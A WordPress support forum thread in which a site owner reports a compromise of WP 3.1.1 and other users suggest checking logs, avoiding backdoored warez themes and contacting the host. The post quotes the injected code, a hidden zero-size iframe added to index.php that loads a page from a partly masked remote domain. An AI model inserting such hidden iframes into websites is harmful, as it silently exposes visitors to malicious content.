Somebody just exploited my WP 3.1.1

  • flapane

    (@flapane)


    12 years, 12 months ago

    They added an iframe at the end of index.php:
    ?<html><body><iframe src=”http://xxxxxauto7xxxx.xxxxxxxxxxxx/go.php?sid=2&#8243; width=”0″ height=”0″ frameborder=”0″></iframe></body></html>>

    WP 3.1.2 has JUST been released, I haven’t seen the changelog yet, but I thought that it was a good thing to tell you what happend.
    My WP is in italian language, and the upgrade panel has only the english version atm.
    May I upgrade with the english version of WP3.1.2? Will my control panel be in english? Can I somehow add the italian language when it will be ready in the next days?
    thanks

Viewing 5 replies - 1 through 5 (of 5 total)
  • al3x88

    (@al3x88)

    12 years, 12 months ago

    Have you checked the access log? WordPress 3.1.2 just solves a bug that permits contributors to post new articles.

    Thread Starter flapane

    (@flapane)

    12 years, 12 months ago

    I didn’t see new articles in the control panel, they hardcoded the iframe in /index.php, just before the final ?>

    al3x88

    (@al3x88)

    12 years, 12 months ago

    Ok, but have you access to the access logs of your site? Are you using a custom theme? Warez theme?

    Some of them are backdoored.

    Thread Starter flapane

    (@flapane)

    12 years, 12 months ago

    No, it’s a theme I wrote on my own from scratch (but the “critical” php code comes from the default WP theme, I mostly made css and graphical customizations), and the cPanel log unfortunately isn’t accessible from the customers.

    al3x88

    (@al3x88)

    12 years, 12 months ago

    Open a ticket to the hoster, most of them let users see the logs on cpanel, if not just ask and you probably see what they’ve accessed.

    If the wordpress team know about a security issue for sure they will fix it.

Viewing 5 replies - 1 through 5 (of 5 total)
  • The topic ‘Somebody just exploited my WP 3.1.1’ is closed to new replies.